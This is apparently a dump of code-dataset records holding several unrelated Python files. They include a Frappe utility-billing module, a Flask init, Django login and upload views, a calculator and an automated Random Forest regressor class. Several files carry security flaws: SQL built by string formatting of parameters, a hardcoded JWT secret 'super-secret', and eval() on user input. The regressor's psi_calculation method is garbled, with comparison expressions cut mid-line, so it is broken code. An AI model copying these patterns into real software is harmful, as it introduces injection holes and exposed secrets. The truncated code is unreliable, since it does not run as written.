VW'\n\t\t\t})\n\t\telse:\n\t\t\tfrappe.throw(\"Something Went Wrong While Determining Applicable Meter Rent\")\n\n\t\t# check if the sales invoice already exist\n\t\tcheck_if_sales_invoice_exist(list_item[\"customer\"],list_item[\"billing_period\"])\n\t\t# save the invoice\n\t\tdoc.insert()\n\t\t#submit the invoice\n\t\tdoc.submit()\n\n\ndef get_zone_and_area_using_route(name_of_route):\n\t'''\n\tFunction that gets the zone and area under which\n\ta given route lies\n\t'''\n\t# get area\n\troute_doc =frappe.get_doc(\"Territory\", name_of_route)\n\troute_zone = route_doc.parent_territory\n\tzone_doc = frappe.get_doc(\"Territory\", route_zone)\n\troute_area = zone_doc.parent_territory\n\treturn {\"zone\":route_zone,\"area\":route_area}\n\ndef get_disconnection_profile(customer_type):\n\t'''\n\tFunction that get the disconnection profile based on the \n\ttype of customer given\n\t'''\n\tdisconnection_profile = frappe.get_list(\"Disconnection Profile\",\n\t\tfields=[\"*\"],\n\t\tfilters = {\n\t\t\t\"customer_group\":customer_type\n\t})\n\n\tif(len(disconnection_profile)!=0):\n\t\treturn disconnection_profile[0]\n\telse:\n\t\tfail_message = \"No Disconnection Profile for Customer Type {}\".format(customer_type)\n\t\tfrappe.throw(fail_message)\n\ndef loop_through_tariffs(applicable_tarrifs,consumption):\n\tlist_of_tariffs = []\n\t# get the first item in the list\n\t\n\tif(len(applicable_tarrifs)==1):\n\t\t# get first item\n\t\tkey_value_holder = {}\n\t\tfirst_item = applicable_tarrifs[:1]\n\t\tkey_value_holder[\"name\"]=first_item[0][0]\n\t\tkey_value_holder[\"qty\"]=1\n\t\tlist_of_tariffs.append(key_value_holder)\n\t\treturn list_of_tariffs\n\n\telif(len(applicable_tarrifs)==2):\n\t\t# get first item\n\t\tkey_value_holder = {}\n\t\tfirst_item = applicable_tarrifs[:1]\n\t\tkey_value_holder[\"name\"]=first_item[0][0]\n\t\tkey_value_holder[\"qty\"]=1\n\t\tlist_of_tariffs.append(key_value_holder)\n\n\t\t# get last item\n\t\tkey_value_holder = {}\n\t\tlast_item = applicable_tarrifs[len(applicable_tarrifs)-1:]\n\t\tunits_within_category = (int(consumption) - last_item[0][2]) +1\n\t\tkey_value_holder[\"name\"]=last_item[0][0]\n\t\tkey_value_holder[\"qty\"]=units_within_category\n\t\tlist_of_tariffs.append(key_value_holder)\n\t\treturn list_of_tariffs\n\n\telif(len(applicable_tarrifs)>2):\n\t\t# get first item\n\t\tkey_value_holder = {}\n\t\tfirst_item = applicable_tarrifs[:1]\n\t\tkey_value_holder[\"name\"]=first_item[0][0]\n\t\tkey_value_holder[\"qty\"]=1\n\t\tlist_of_tariffs.append(key_value_holder)\n\n\t\t# get middle items\n\t\tmiddle_items = (applicable_tarrifs[1:len(applicable_tarrifs)-1])\n\t\tfor item in middle_items:\n\t\t\tkey_value_holder = {}\n\t\t\tkey_value_holder[\"name\"]=item[0]\n\t\t\tkey_value_holder[\"qty\"]=item[1]\n\t\t\tlist_of_tariffs.append(key_value_holder)\n\t\n\t\t# get last item\n\t\tkey_value_holder = {}\n\t\tlast_item = applicable_tarrifs[len(applicable_tarrifs)-1:]\n\t\tunits_within_category = (int(consumption) - last_item[0][2]) +1\n\t\tkey_value_holder[\"name\"]=last_item[0][0]\n\t\tkey_value_holder[\"qty\"]=units_within_category\n\t\tlist_of_tariffs.append(key_value_holder)\n\t\treturn list_of_tariffs\n\n\ndef get_applicable_tariff(type_of_customer,type_of_item,consumption):\n\t'''\n\tFunction that get all the applicable items Tariffs\n\tbased on the type of customer\n\t'''\n\t# get the applicable tarrifs based on the consumption\n\tapplicable_tariffs = frappe.db.sql(\"\"\"SELECT name,difference_btw_max_and_min,min_quantity from `tabItem` WHERE type_of_customer = '{}' AND type_of_item = '{}' and min_quantity <= {} ORDER BY min_quantity \"\"\".format(type_of_customer,type_of_item,consumption))\n\tif(len(applicable_tariffs) == 0):\n\t\tfrappe.throw(\"No Tarrifs Exist for customer type {}\".format(type_of_customer))\n\telse:\n\t\treturn applicable_tariffs\n\ndef get_applicable_rent(type_of_customer,type_of_item):\n\t'''\n\tFunction that get all the applicable Meter Rent\n\tbased on the type of customer\n\t'''\n\t# get applicable meter rent based on type_of_customer\n\tapplicable_meter_rent = frappe.db.sql(\"\"\"SELECT name from `tabItem` WHERE type_of_customer = '{}' AND type_of_item = '{}'\"\"\".format(type_of_customer,type_of_item))\n\tif(len(applicable_meter_rent) == 0):\n\t\tfrappe.throw(\"No Meter Rent Costs Exist for customer type {}\".format(type_of_customer))\n\telse:\n\t\treturn applicable_meter_rent\n\t\t\n\ndef check_if_sales_invoice_exist(customer_name,billing_period):\n\t'''\n\tFunction that checks if a given billing period has \n\talready been created\n\t'''\n\tduplicate_sales_invoices = frappe.get_list(\"Sales Invoice\",\n\t\tfields=[\"*\"],\n\t\tfilters = {\n\t\t\t\"customer\":customer_name,\n\t\t\t\"billing_period\":billing_period\n\t})\n\n\tif(len(duplicate_sales_invoices)==0):\n\t\tpass\n\telse:\n\t\tfail_message = \"A Sales invoice for {} for customer {} Already Exist\".format(billing_period,customer_name)\n\t\tfrappe.throw(fail_message)\n\t\n\t\n","sub_path":"washmis_erp/washmis_erp/doctype/meter_reading_capture/meter_reading_capture.py","file_name":"meter_reading_capture.py","file_ext":"py","file_size_in_byte":10207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"100710649","text":"from flask import Flask, request as req\nfrom flask_jwt_extended import (\n JWTManager, jwt_required, create_access_token,\n get_jwt_identity\n)\nfrom app.views import views\n\n# se crea el microfamework flask\napp = Flask(__name__)\napp.register_blueprint(views.blueprint)\napp.config['JWT_SECRET_KEY'] = 'super-secret' \njwt = JWTManager(app)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"250989803","text":"import os, sys\nimport numpy as np\n\nfrom molmass import *\nfrom elements import ELEMENTS\n\nif __name__ == \"__main__\":\n cp = {\"N2\": 0.78084,\n \"O2\": 0.20946,\n \"Ar\": 0.0934,\n \"CO2\": 0.00041332,\n \"CH4\": 0.00000114}\n\n ep = {}\n for mol, bw in cp.items():\n f = Formula(mol)\n molc = f.composition()\n for el in molc:\n if el[0] not in ep.keys():\n ep[el[0]] = 0.0\n\n #ep[el[0]] += el[2] * bw / ELEMENTS[el[0]].mass\n ep[el[0]] += bw * el[1]\n\n ntot = 0\n for e, n in ep.items():\n ntot += n\n\n for e, n in ep.items():\n print(f\"{e}: {n/ntot:8.7f}\")","sub_path":"util/comp_help.py","file_name":"comp_help.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"8600081","text":"from __future__ import print_function, unicode_literals, division, absolute_import\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseForbidden, HttpResponseRedirect\nimport django.contrib.auth\nimport datetime\nimport flat.settings as settings\nimport flat.comm\nimport flat.users\nimport urllib2\nimport os\n\ndef login(request):\n if 'username' in request.POST and 'password' in request.POST:\n username = request.POST['username']\n password = request.POST['password']\n request.session['configuration'] = request.POST['configuration']\n user = django.contrib.auth.authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n django.contrib.auth.login(request, user)\n # Redirect to a success page.\n if 'next' in request.POST:\n return redirect(\"/\" + request.POST['next'])\n elif 'next' in request.GET:\n return redirect(\"/\" + request.GET['next'])\n else:\n return redirect(\"/\")\n else:\n # Return a 'disabled account' error message\n return render(request, 'login.html', {'error': \"This account is disabled\",\"defaultconfiguration\":settings.DEFAULTCONFIGURATION, \"configurations\":settings.CONFIGURATIONS , 'version': settings.VERSION} )\n else:\n # Return an 'invalid login' error message.\n return render(request, 'login.html', {'error': \"Invalid username or password\",\"defaultconfiguration\":settings.DEFAULTCONFIGURATION, \"configurations\":settings.CONFIGURATIONS, 'version': settings.VERSION} )\n else:\n return render(request, 'login.html',{\"defaultconfiguration\":settings.DEFAULTCONFIGURATION, \"configurations\":settings.CONFIGURATIONS})\n\n\ndef logout(request):\n if 'configuration' in request.session:\n del request.session['configuration']\n django.contrib.auth.logout(request)\n return redirect(\"/login\")\n\n\ndef register(request):\n if request.method == 'POST':\n form = django.contrib.auth.forms.UserCreationForm(request.POST)\n if form.is_valid():\n new_user = form.save()\n return HttpResponseRedirect(\"/login/\")\n else:\n form = django.contrib.auth.forms.UserCreationForm()\n return render(request, \"register.html\", {\n 'form': form,\n })\n\n\n\n@login_required\ndef index(request):\n docs = {}\n try:\n namespaces = flat.comm.get(request, '/getnamespaces/', False)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n if not request.user.username in namespaces['namespaces']:\n try:\n flat.comm.get(request, \"makenamespace/\" + request.user.username, False)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n\n namespaces_sorted = sorted([x for x in namespaces['namespaces'] if x != request.user.username])\n namespaces_sorted = [request.user.username] + namespaces_sorted\n for namespace in namespaces_sorted:\n if flat.users.models.hasreadpermission(request.user.username, namespace):\n try:\n r = flat.comm.get(request, '/getdocuments/' + namespace, False)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n docs[namespace] = []\n for d in sorted(r['documents']):\n docid = os.path.basename(d.replace('.folia.xml',''))\n docs[namespace].append( (docid, round(r['filesize'][d] / 1024 / 1024,2) , datetime.datetime.fromtimestamp(r['timestamp'][d]).strftime(\"%Y-%m-%d %H:%M\") ) )\n\n if not 'configuration' in request.session:\n return logout(request)\n\n sorteddocs = [ (k, docs[k]) for k in namespaces_sorted if k in docs ]\n\n return render(request, 'index.html', {'docs': sorteddocs, 'defaultmode': settings.DEFAULTMODE,'loggedin': request.user.is_authenticated(), 'username': request.user.username, 'configuration': settings.CONFIGURATIONS[request.session['configuration']], 'version': settings.VERSION, 'namespaces': namespaces_sorted})\n\n@login_required\ndef download(request, namespace, docid):\n data = flat.comm.get(request, '/getdocxml/' +namespace + '/' + docid + '/',False)\n return HttpResponse(data, mimetype='text/xml')\n\n\n@login_required\ndef upload(request):\n if request.method == 'POST':\n namespace = request.POST['namespace'].replace('/','').replace('..','.')\n if flat.users.models.haswritepermission(request.user.username, namespace) and 'file' in request.FILES:\n data = unicode(request.FILES['file'].read(),'utf-8')\n try:\n response = flat.comm.postxml(request,\"upload/\" + namespace , data)\n except urllib2.URLError:\n return HttpResponseForbidden(\"Unable to connect to the document server\")\n if 'error' in response and response['error']:\n return HttpResponseForbidden(response['error'])\n else:\n docid = response['docid']\n return HttpResponseRedirect(\"/\" + settings.DEFAULTMODE + \"/\" + namespace + \"/\" + docid )\n else:\n return HttpResponseForbidden(\"Permission denied\")\n else:\n return HttpResponseForbidden(\"Permission denied\")\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"204215414","text":"import math\n\ntry:\n userinput = eval(input(\"Please enter a number: \"))\n print(\"0. Quit\\n1. Square\\n2. Square root\\n3. Sin\\n4. Factorial\")\n choice = eval(input(\"\\nPlease enter a choice 1-4: \"))\n\n if choice >=1 and choice <=4:\n \n if choice == 1:\n output = userinput**2\n elif choice == 2:\n output = math.sqrt(userinput)\n elif choice == 3:\n output = math.sin(userinput)\n else:\n output = math.factorial(userinput)\n\n print(output)\n\n elif choice == 0:\n print(\"\\nSee ya later!\")\n \n else:\n print(\"Your input was not valid\")\n\nexcept TypeError:\n print(\"Your input was not a number\")\n\nexcept SyntaxError:\n print(\"Your input was not in the right form.\")\n\nexcept NameError:\n print(\"You didnt enter a number!\")\n\nexcept:\n print(\"Something went wrong!\")\n","sub_path":"quadratics.py","file_name":"quadratics.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"243977676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 12 13:13:34 2019\r\n\r\n@author: Salim\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.tree import export_graphviz\r\nimport warnings\r\nfrom subprocess import call\r\nimport openpyxl\r\nfrom openpyxl import Workbook\r\nimport operator\r\nfrom datetime import datetime\r\nfrom sklearn.externals import joblib\r\nimport os\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nclass Random_Forest_Regressor():\r\n \"\"\"\r\nAn automated Random Forest Regressor.\r\nParameters\r\n----------\r\ndev_data : dataframe, optional (default=None)\r\n Specify the name of your Development dataset \r\n (as assigned to the dataframe of the .csv file).\r\n\r\noos_data : dataframe, optional (default=None)\r\n Specify the name of your Out of Sample dataset \r\n (as assigned to the dataframe of the .csv file).\r\n \r\noot_data : dataframe, optional (default=None)\r\n Specify the name of your Out of Time dataset \r\n (as assigned to the dataframe of the .csv file).\r\n \r\npdv_data : dataframe, optional (default=None)\r\n Specify the name of your Pre Deployment dataset \r\n (as assigned to the dataframe of the .csv file).\r\n \r\npsi_data : dataframe, optional (default=None)\r\n Specify the name of your Population Stability Index dataset \r\n (as assigned to the dataframe of the .csv file).\r\n The PSI data would not have the target variable column,\r\n as the values for it are to be predicted.\r\n\r\ndependent : string, optional (default=\"None\")\r\n The name of the target variable whose values are to be predicted. \r\n True values for this variable are present in all datasets except the PSI data.\r\n Values for this variable are predicted and compared to create necessary \r\n metrics and also to analyse the performance of the PSI data.\r\n\r\nsplit_flag : bool, optional (default=False)\r\n Whether you want to split your Development data into Development and \r\n OOS data. If True it splits the data into development and OOS\r\n using stratified sampling. If False, it uses the entire development \r\n data without splitting.\r\n \r\nsplit_fraction : float, optional (default=0.0)\r\n The fraction of split of the OOS data. It's value is passed\r\n only if the norm_flag is set to be True.\r\n\r\nhyperopt_flag : bool, optional (default=False)\r\n Whether you want to tune your hyperparameters. If True,\r\n it uses Grid Search CV to find\r\n the best parameters. If False it uses the default parameters. \r\n\r\nlocation : string, optional (default=\"None\")\r\n The path of the folder where you want your results to be saved.\r\n \r\nproject_name : string, optional (default=\"None\")\r\n The name of the project by which you want your results to be saved.\r\n\r\ncols_list : list, optional (default=\"None\")\r\n List of names of columns for which you want the Random Forest\r\n module to be built upon. This column list also contains\r\n the name of the dependent variable.\r\n\r\n\r\n\r\nMethods\r\n----------\r\n__init__ : Initializes all the variables when an \r\n object of the class is called. It has all the above \r\n mentioned parameters along with their default values.\r\n\r\nclear_columns : Creates a dataframe for only those columns \r\n which are specified in the parameter 'cols_list'. Rest other variables\r\n are not considered while executing the code. It does this for all the datasets.\r\n \r\nsplit_train_test : Splits the 'dev_data' into 'train_data' and 'oos_data',\r\n if the 'split_flag' is True. It determines the size of the oos_data by the\r\n value of 'split_fraction'. The splitting is done by using stratified sampling.\r\n\r\nsplit_X_Y : Splits the dataframe into X and Y. Y is the dataframe containing the\r\n target variable and X is the dataframe containing all other variables. This function\r\n is used by the function 'split_train_test', before it splits the data.\r\n\r\ncombine_X_Y : Combines the previously created dataframes (X and Y) into a single\r\n dataframe, after splitting has been performed.\r\n\r\nprocess_data : Combines all the dataframes and does some preprocessing of the categorical\r\n variables. It converts all the categorical columns into uppercase and strips all the blank\r\n spaces, if there are any. It then encodes all categorical variables by using\r\n function 'convert_categorical'. After the conversion is done, the datasets are separated \r\n again. Combining of datasets is done so that if the test datasets have more/less \r\n categories as compared to the train data, the code will give an error. \r\n\r\nconvert_categorical : Creates dummies for all categorical variables for the entered\r\n dataframe. It creates n-1 dummy columns for a column which has n categories and\r\n returns the new dataframe.\r\n\r\nRandom_Forest_Train : Fits the Random Forest Regressor model on the training data\r\n and returns the trained model.\r\n\r\nhyperopt : Tunes the hyperparameters and chooses the best parameters from the default\r\n pool of values.If True it uses Grid Search CV to find the \r\n best parameters and returns the model fitted with the best parameters. If False \r\n it uses the default parameters and returns the original model.\r\n \r\nreg_metrics : Scores the dataset and calculates R square, Adjusted R square, \r\n Mean Squared Error and Root Mean Squared Error for it. It returns a table created\r\n out of the values of the above mentioned metrics. \r\n\r\npsi_calculation : Scores the training data using the model and creates bands of 20 \r\n percentiles each. It then scores the PSI data and gives the median of values in each\r\n bin, after classifying them as per the percentile bins created by the dependent \r\n column of the training data. It returns a table created out of the median values of \r\n the training and the psi data.\r\n\r\nsave_files : Calls all other functions. It calculates the univariate distribution\r\n for each dataset, feature importance for each variable (and sorts them in descending order),\r\n the correlation coefficient among all indepedent variables. It saves all of the \r\n above mentioned results in an excel file along with the order of variables which \r\n would be used to score new data in future (ORDER SHOULD NOT BE CHANGED).\r\n These things are saved at the location provided by the user with the\r\n project name (also provided by the user), without any human intervention. Along \r\n with this, it also saves the Performance tables for all datasets in the same excel file.\r\n It also saves the PSI table and the PSI Performance Graph (in the excel file \r\n and as a separate .png file) and the trained model in serialized form for future use\r\n (in the excel file and as a separate .png file) in the same location without any human intervention.\r\n All the files in the provided location are saved such that the file names \r\n are followed by the time of the system at which the program is executed. This is \r\n done to avoid overwriting of the files when the program is executed multiple times. \r\n\r\n \"\"\"\r\n def __init__(self,dev_data=None,oos_data=None,oot_data=None,pdv_data=None,psi_data=None,dependent=None,split_flag=False,split_fraction=0,cols_list=None,hyperopt_flag=False,location=None,project_name=None):\r\n self.dev_data=dev_data\r\n self.oos_data=oos_data\r\n self.oot_data=oot_data\r\n self.pdv_data=pdv_data\r\n self.psi_data=psi_data\r\n self.dependent=dependent\r\n self.split_flag=split_flag\r\n self.split_fraction=split_fraction\r\n self.cols_list=cols_list\r\n self.hyperopt_flag=hyperopt_flag\r\n self.location=location\r\n self.project_name=project_name\r\n \r\n def clear_columns(self):\r\n self.dev_data=self.dev_data[self.cols_list]\r\n if self.oos_data is not None:\r\n self.oos_data=self.oos_data[self.cols_list]\r\n self.oot_data=self.oot_data[self.cols_list]\r\n self.pdv_data=self.pdv_data[self.cols_list]\r\n self.cols_list.remove(self.dependent)\r\n self.psi_data=self.psi_data[self.cols_list]\r\n \r\n def split_train_test(self):\r\n self.clear_columns()\r\n if self.split_flag==True:\r\n data1,data2=self.split_X_Y(self.dev_data)\r\n df2X,df3X,df2Y,df3Y = train_test_split(data1,data2,test_size=self.split_fraction, random_state=42)\r\n self.train_data=self.combine_X_Y(df2X,df2Y)\r\n self.train_data.reset_index(inplace=True)\r\n self.oos_data=self.combine_X_Y(df3X,df3Y)\r\n self.oos_data.reset_index(inplace=True)\r\n self.copy_train=self.train_data\r\n self.copy_oos=self.oos_data\r\n self.copy_oot=self.oot_data\r\n self.copy_pdv=self.pdv_data\r\n self.copy_psi=self.psi_data\r\n \r\n elif self.split_flag==False:\r\n self.train_data=self.dev_data\r\n self.oos_data=self.oos_data\r\n self.copy_train=self.train_data\r\n self.copy_oos=self.oos_data\r\n self.copy_oot=self.oot_data\r\n self.copy_pdv=self.pdv_data\r\n self.copy_psi=self.psi_data\r\n \r\n def split_X_Y(self,df):\r\n X=df.drop([self.dependent],axis=1)\r\n Y=pd.DataFrame(df,columns=[self.dependent])\r\n return X,Y\r\n\r\n def combine_X_Y(self,df1,df2):\r\n df3=pd.concat([df1,pd.DataFrame(df2,columns=[self.dependent])],axis=1)\r\n return df3\r\n \r\n def process_data(self):\r\n if self.oos_data is not None:\r\n \r\n self.train_data.loc[self.train_data[self.dependent]==0, self.dependent] = 0.001\r\n self.Y_train=pd.DataFrame(np.log(self.train_data[self.dependent]),columns=[self.dependent])\r\n self.oos_data.loc[self.oos_data[self.dependent]==0, self.dependent] = 0.001\r\n self.oos_Y=pd.DataFrame(np.log(self.oos_data[self.dependent]),columns=[self.dependent])\r\n self.oot_data.loc[self.oot_data[self.dependent]==0, self.dependent] = 0.001\r\n self.oot_Y=pd.DataFrame(np.log(self.oot_data[self.dependent]),columns=[self.dependent])\r\n self.pdv_data.loc[self.pdv_data[self.dependent]==0, self.dependent] = 0.001\r\n self.pdv_Y=pd.DataFrame(np.log(self.pdv_data[self.dependent]),columns=[self.dependent])\r\n \r\n self.train_data['dummy']=0\r\n self.oos_data['dummy']=1\r\n self.oot_data['dummy']=2\r\n self.pdv_data['dummy']=3\r\n self.psi_data['dummy']=4\r\n\r\n combine=pd.concat([self.train_data[self.cols_list+['dummy']],self.oos_data[self.cols_list+['dummy']],self.oot_data[self.cols_list+['dummy']],self.pdv_data[self.cols_list+['dummy']],self.psi_data[self.cols_list+['dummy']]])\r\n \r\n# combine[combine.select_dtypes(include=np.number).columns] = combine[combine.select_dtypes(include=np.number).columns].fillna(value=99999999)\r\n combine[combine.select_dtypes(exclude=np.number).columns] = combine[combine.select_dtypes(exclude=np.number).columns].fillna(value=\"MISSING\")\r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.upper()) \r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.strip()) \r\n \r\n ohe=self.convert_categorical(combine)\r\n \r\n self.train_data=ohe[ohe['dummy']==0]\r\n self.oos_data=ohe[ohe['dummy']==1]\r\n self.oot_data=ohe[ohe['dummy']==2]\r\n self.pdv_data=ohe[ohe['dummy']==3]\r\n self.psi_data=ohe[ohe['dummy']==4]\r\n \r\n self.train_data.drop(['dummy'],axis=1,inplace=True)\r\n self.oos_data.drop(['dummy'],axis=1,inplace=True)\r\n self.oot_data.drop(['dummy'],axis=1,inplace=True)\r\n self.pdv_data.drop(['dummy'],axis=1,inplace=True)\r\n self.psi_data.drop(['dummy'],axis=1,inplace=True)\r\n \r\n else:\r\n \r\n self.train_data.loc[self.train_data[self.dependent]==0, self.dependent] = 0.001\r\n self.Y_train=pd.DataFrame(np.log(self.train_data[self.dependent]),columns=[self.dependent])\r\n self.oot_data.loc[self.oot_data[self.dependent]==0, self.dependent] = 0.001\r\n self.oot_Y=pd.DataFrame(np.log(self.oot_data[self.dependent]),columns=[self.dependent])\r\n self.pdv_data.loc[self.pdv_data[self.dependent]==0, self.dependent] = 0.001\r\n self.pdv_Y=pd.DataFrame(np.log(self.pdv_data[self.dependent]),columns=[self.dependent])\r\n \r\n self.train_data['dummy']=0\r\n self.oot_data['dummy']=1\r\n self.pdv_data['dummy']=2\r\n self.psi_data['dummy']=3\r\n \r\n combine=pd.concat([self.train_data[self.cols_list+['dummy']],self.oot_data[self.cols_list+['dummy']],self.pdv_data[self.cols_list+['dummy']],self.psi_data[self.cols_list+['dummy']]])\r\n \r\n# combine[combine.select_dtypes(include=np.number).columns] = combine[combine.select_dtypes(include=np.number).columns].fillna(value=99999999)\r\n combine[combine.select_dtypes(exclude=np.number).columns] = combine[combine.select_dtypes(exclude=np.number).columns].fillna(value=\"MISSING\")\r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.upper()) \r\n combine.loc[:,combine.dtypes=='O']=combine.loc[:,combine.dtypes=='O'].apply(lambda x: x.astype(str).str.strip()) \r\n \r\n ohe=self.convert_categorical(combine)\r\n \r\n self.train_data=ohe[ohe['dummy']==0]\r\n self.oot_data=ohe[ohe['dummy']==1]\r\n self.pdv_data=ohe[ohe['dummy']==2]\r\n self.psi_data=ohe[ohe['dummy']==3]\r\n \r\n self.train_data.drop(['dummy'],axis=1,inplace=True)\r\n self.oot_data.drop(['dummy'],axis=1,inplace=True)\r\n self.pdv_data.drop(['dummy'],axis=1,inplace=True)\r\n self.psi_data.drop(['dummy'],axis=1,inplace=True)\r\n \r\n def convert_categorical(self, df):\r\n ohe_df=pd.get_dummies(df,columns=df.select_dtypes(exclude=np.number).columns,drop_first=True)\r\n return ohe_df\r\n\r\n def Random_Forest_Train(self):\r\n self.forest=RandomForestRegressor(n_jobs=1)\r\n self.forest.fit(self.train_data,self.Y_train)\r\n return self.forest\r\n \r\n def hyperopt(self):\r\n if self.hyperopt_flag==True:\r\n param_grid = {'max_depth': [3,5,7,9],'n_estimators': [50,200,400,600]}\r\n self.forest_cv=GridSearchCV(self.forest, param_grid)\r\n self.forest_cv.fit(self.train_data, self.Y_train)\r\n print(self.forest_cv.best_params_)\r\n self.best_grid = self.forest_cv.best_estimator_\r\n return self.best_grid\r\n elif self.hyperopt_flag==False: \r\n return self.forest\r\n \r\n def reg_metrics(self,X_test,Y_test):\r\n truth=np.exp(Y_test)\r\n pred=self.model.predict(X_test)\r\n Y_pred=np.exp(pred)\r\n metrics=['R squared','Adjusted R squared','Mean Square Error','RMSE']\r\n score=pd.DataFrame(metrics,columns=['Metrics'])\r\n r_squared=r2_score(truth,Y_pred)\r\n adjusted_r_squared=1 - (1-r_squared)*(len(Y_test)-1)/(len(Y_test)-X_test.shape[1]-1)\r\n mse=mean_squared_error(truth,Y_pred)\r\n rmse=np.sqrt(mse)\r\n values=[r_squared,adjusted_r_squared,mse,rmse]\r\n score['Values']=values\r\n return score\r\n \r\n def psi_calculation(self):\r\n score=np.exp(self.Y_train)\r\n score.columns=['Expected']\r\n values=[score.Expected.min(),score.Expected.quantile(0.2),score.Expected.quantile(0.4),score.Expected.quantile(0.6),score.Expected.quantile(0.8),score.Expected.max()]\r\n score['Bands'] = 1\r\n score.loc[((score['Expected']>=values[0])&(score['Expected']=values[1])&(score['Expected']=values[2])&(score['Expected']=values[3])&(score['Expected']=values[4])&(score['Expected']=values[0])&(actual['Actual']=values[1])&(actual['Actual']=values[2])&(actual['Actual']=values[3])&(actual['Actual']=values[4])&(actual['Actual']= \"+np.round(values[0],3).astype(\"str\") +\" AND < \"+np.round(values[1],3).astype(\"str\")\r\n score.loc[1,'Bands']=\">= \"+np.round(values[1],3).astype(\"str\") +\" AND < \"+np.round(values[2],3).astype(\"str\")\r\n score.loc[2,'Bands']=\">= \"+np.round(values[2],3).astype(\"str\") +\" AND < \"+np.round(values[3],3).astype(\"str\")\r\n score.loc[3,'Bands']=\">= \"+np.round(values[3],3).astype(\"str\") +\" AND < \"+np.round(values[4],3).astype(\"str\")\r\n score.loc[4,'Bands']=\">= \"+np.round(values[4],3).astype(\"str\") +\" AND < \"+np.round(values[5],3).astype(\"str\")\r\n return score\r\n \r\n \r\n def save_files(self): \r\n self.split_train_test()\r\n self.process_data()\r\n self.forest=self.Random_Forest_Train()\r\n self.model=self.hyperopt()\r\n self.table_train=self.reg_metrics(self.train_data,self.Y_train)\r\n if self.oos_data is not None:\r\n self.table_oos=self.reg_metrics(self.oos_data,self.oos_Y)\r\n else:\r\n self.table_oos=None\r\n self.table_oot=self.reg_metrics(self.oot_data,self.oot_Y)\r\n self.table_pdv=self.reg_metrics(self.pdv_data,self.pdv_Y)\r\n self.table_psi=self.psi_calculation()\r\n time=datetime.now()\r\n book=Workbook() \r\n path=os.path.join(self.location,\"Performance_\"+str(self.project_name)+\"_\"+time.strftime(\"%d-%m-%Y %H-%M-%S\")+\".xlsx\")\r\n writer = pd.ExcelWriter(path, engine='openpyxl')\r\n writer.book=book\r\n self.table_train.to_excel(writer,sheet_name=\"Development Performance\")\r\n pd.concat([self.copy_train.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_train.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"Development Variables Distribution\")\r\n if self.table_oos is not None:\r\n self.table_oos.to_excel(writer,sheet_name=\"OOS Performance\")\r\n pd.concat([self.copy_oos.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_oos.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"OOS Variables Distribution\")\r\n self.table_oot.to_excel(writer,sheet_name=\"OOT Performance\")\r\n pd.concat([self.copy_oot.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_oot.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"OOT Variables Distribution\")\r\n self.table_pdv.to_excel(writer,sheet_name=\"PDV Performance\")\r\n pd.concat([self.copy_pdv.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_pdv.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"PDV Variables Distribution\")\r\n self.table_psi.to_excel(writer,sheet_name=\"PSI Performance\")\r\n pd.concat([self.copy_psi.describe(percentiles=[0.005,0.01,0.025,0.05,0.1,0.2,0.25,0.3,0.4,0.5,0.6,0.7,0.75,0.8,0.9,0.975,0.99]).T,pd.DataFrame(self.copy_psi.isnull().sum(),columns=['Missing Values'])],axis=1).to_excel(writer,sheet_name=\"PSI Variables Distribution\")\r\n fi=list(zip(self.train_data.columns,self.model.feature_importances_))\r\n fi.sort(key=operator.itemgetter(1),reverse=True)\r\n pd.DataFrame(fi,columns=['Variables','Feature Importance']).to_excel(writer,sheet_name=\"Feature Importances\",index=False)\r\n self.train_data.corr().to_excel(writer,sheet_name=\"Correlation Matrix\") \r\n ax = plt.gca() \r\n 